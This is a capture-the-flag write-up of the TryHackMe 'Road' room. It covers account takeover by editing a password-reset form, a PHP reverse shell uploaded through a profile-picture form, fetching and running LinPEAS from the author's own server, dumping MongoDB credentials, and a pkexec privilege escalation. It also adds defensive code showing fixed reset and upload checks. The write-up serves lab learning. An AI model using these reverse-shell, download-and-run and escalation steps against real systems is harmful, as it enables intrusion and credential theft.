THM Road Writeup
The writeup below is for the Road room on TryHackMe. The room is rated medium difficulty, and I've included links to it at the bottom of the page.
Brief
I had a read through the brief, and the only two clues on there are that the flags are user.txt and root.txt. I didn't have much to go on as a starting point!
Starting Out
Starting out I did the usual Nmap scan, saving the output so I could refer back to it if I needed to.
nmap -sV -sC -p- -A -T5 -oN ./nmap/initial <IP>
# -p- scans all 65535 TCP ports; -A already implies -sV and -sC (plus OS detection and traceroute)
# -T5 is the fastest timing template (fine in a lab, noisy and lossy elsewhere); -oN saves the output to a file

Having looked through the Nmap output, the logical next step was web enumeration.
Reach for the Sky!
Heading to the site on port 80, I was greeted with the page below;

I had a read through the site's source code and looked through some of the JavaScript, but ultimately we want to go to the Merchant Central link in the top right.
Within there, create a user account with any random email address and password, then log in.
From the profile page (top right), I found an option to upload a new profile picture.

So, with the admin's login name, it was time to get their password!
I found the reset user option on the left side. I could have intercepted the request using Firefox's network tab or Burp Suite, but I wanted to see if there was a quicker way. There was….

There was a way! Right-clicking and inspecting the element allowed me to change the username in the box to the admin username. I then just typed in a new password and I was good to go with the admin account! The application takes the account to reset from the submitted form field rather than from the logged-in session, so whatever username the browser sends is the one whose password gets changed.
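To make the flaw behind that reset form concrete, here is an added example (not the Road application's code; the user store, form field names and session layout are all assumptions) of a reset handler that trusts the client-supplied username beside one that binds the target account to the server-side session:

```python
"""Password reset that trusts a client-supplied username, beside a version
that binds the target account to the server-side session.
Constructed example for this writeup; it is not the Road application's code,
and the user store, field names and session layout are assumptions."""
import hashlib
import hmac
import os

# Constructed in-memory user store: username -> (salt, PBKDF2 digest)
USERS = {}


def _digest(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def set_password(username: str, password: str) -> None:
    """Create the account or rotate its password (fresh salt each time)."""
    salt = os.urandom(16)
    USERS[username] = (salt, _digest(password, salt))


def check_login(username: str, password: str) -> bool:
    if username not in USERS:
        return False
    salt, stored = USERS[username]
    return hmac.compare_digest(stored, _digest(password, salt))


def reset_password_vulnerable(session: dict, form: dict) -> bool:
    """Broken: the account to reset is read from the submitted form.
    A read-only or pre-filled username box is only a hint to the browser;
    editing it in the inspector (or replaying the request) changes the target."""
    if not session.get("logged_in"):
        return False
    target = form.get("username", "")
    if target not in USERS:
        return False
    set_password(target, form["new_password"])
    return True


def reset_password_fixed(session: dict, form: dict) -> bool:
    """Hardened: the target is the authenticated session user, whatever the
    form claims, and the current password is required so a hijacked session
    alone cannot rotate it. Administrative resets of other accounts belong in
    a separate, explicitly authorised code path."""
    target = session.get("user")
    if not target or not check_login(target, form.get("current_password", "")):
        return False
    set_password(target, form["new_password"])
    return True
```

The point of the fixed version is that nothing identifying the target account crosses the trust boundary: the form carries only the old and new secrets, and the server already knows who is logged in. Hiding or disabling the username field changes nothing, because the browser is the attacker's tool, not the server's.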
Reversing Down the Road
This new access was great, but I decided now was the time to use the file upload function to upload a PHP reverse shell.

I used the PHP reverse shell from pentestmonkey, with the $ip and $port variables at the top of the file set to my THM IP and port 9002. To be on the safe side, as the upload is expecting an image file, I named it revshell.img.php.
I then started my listener with;
nc -lnvp 9002
# 9002 is the port set within the PHP file
Once I uploaded this, I found the upload directory was not the same directory the current profile image was being served from.
Searching through the source code, I managed to find it!

As this directory won't display file listings, you need to type the full path to your uploaded reverse shell.
Once I browsed to this path, I had my reverse shell on my netcat listener, which I upgraded with;
python3 -c 'import pty; pty.spawn("/bin/bash")'
# plain python does not work on this box, you have to use python3
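The filename trick above works whenever an upload filter keys off the wrong thing. As an added example (not the Road application's code, and the exact check Road performs is unknown), here is a naive substring check that revshell.img.php satisfies, beside a check that trusts only the final extension, verifies the file's magic bytes, and never stores the client's filename; the image signatures, ALLOWED set and stored_name helper are my own choices:

```python
"""Upload filter for a profile-picture endpoint: a naive substring check on
the filename (which a name like revshell.img.php satisfies) beside a check
that trusts only the final extension, verifies the file's magic bytes, and
never stores the client's filename. Constructed example for this writeup;
not the Road application's code, and the exact check Road performs is unknown."""
import os
import secrets

# Leading bytes of the image formats we are willing to accept.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED = {"jpg", "png", "gif"}


def naive_is_image(filename: str) -> bool:
    """Broken: looks for an image-like substring anywhere in the name, so
    'revshell.img.php' passes (mirrors the guess behind the author's filename)."""
    name = filename.lower()
    return any(token in name for token in (".jpg", ".jpeg", ".png", ".gif", ".img"))


def strict_check(filename: str, data: bytes):
    """Returns (accepted, detail). Only the last extension counts, the content
    must begin with a known image signature, and the two must agree."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")  # LAST dot only
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        return False, "extension not in whitelist"
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            if kind != ext:
                return False, "content does not match extension"
            return True, kind
    return False, "no image signature"


def stored_name(kind: str) -> str:
    """Server-chosen name for the saved file; the client's name never hits disk."""
    return secrets.token_hex(16) + "." + kind
```

A polyglot (a real JPEG header with PHP appended) still gets through strict_check, so the last line of defence is the directory itself: the upload location must not be allowed to execute scripts, and because the stored name always ends in an image extension the interpreter never gets a reason to look at it anyway.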

First Flag and Escalation
Finding the first flag was straightforward: it was in the only user's home directory, and I could just change into that directory and read the file with my permissions as www-data.

From here I knew I would have to elevate my privileges somehow, so I decided to enumerate the box using LinPEAS.
From my LinPEAS directory on my own machine I started a web server with;
python3 -m http.server 8090
# 8090 is the port I wanted to serve on
Then on the box I used;
cd /tmp
wget http://<MY_THM_IP>:8090/linpeasn.sh
chmod +x linpeasn.sh
./linpeasn.sh
# I have 2 versions of linpeas in the directory I served from; the one I used is linpeasn.sh

When LinPEAS had finished there were a few areas I had identified, the main 2 being;
- Pkexec – https://gtfobins.github.io/gtfobins/pkexec/ – This would allow for root access BUT the user I currently had wasn't a sudoer
- MongoDB – a MongoDB instance is running locally on this box
MongoDB was the obvious choice and did indeed contain a password for the webdeveloper account.
To get this I used;
mongo
# wait for the mongo shell to load; on newer MongoDB installs the shell is called mongosh, but the commands below are the same
show dbs
# lists the databases; backup is the interesting one
use backup
show collections
# lists the collections in backup; user is the one holding the credentials
db.user.find()
# dumps every document in the user collection, including the webdeveloper password
From there I had the webdeveloper password and could now SSH into the box as webdeveloper.

ssh webdeveloper@<THM_IP>
Pkexec – Works first time?

Absolutely not!
It was worth a try, but over a plain SSH session it won't work: pkexec needs a polkit authentication agent to prompt for the password, and a bare SSH terminal on this Ubuntu box doesn't have one attached. Luckily, I've done a box before where this was the case, so I know a way around this.
NOTE: This is where something like Tilix really helps, because you need two terminal windows and for me it helps to have them side by side.
Open up a new terminal window and SSH in again as the webdeveloper account.
In the original terminal type;
echo $$
# This prints the PID of the shell in that SSH session
Then in the 2nd terminal type;
pkttyagent -p <PID>
# This is the PID from the first SSH terminal; pkttyagent registers a text-mode polkit agent for that process
Back in the first terminal type;
pkexec /bin/bash
This will prompt you to enter the webdeveloper password in the 2nd terminal window. Once that's done you will be the root user in your first terminal, in root's home directory.
The root flag is there and can now be read.

Conclusion
The THM Road box is a good challenge, as not everything is as straightforward as it appears. The method above doesn't cover everything I tried; it's purely the method I used to complete it. I hope this writeup helped you along the way if you got stuck.
As always, if you've got any suggestions for the next one, drop me a message or leave me a comment on YouTube.
Links
https://www.youtube.com/channel/UC_QsRV3S9N5mMkvFXZfY1GQ – YouTube Channel
https://tryhackme.com/room/road – Link to the Road Room to try for yourself
https://tryhackme.com – Link to TryHackMe
Thank you as always for reading
Marc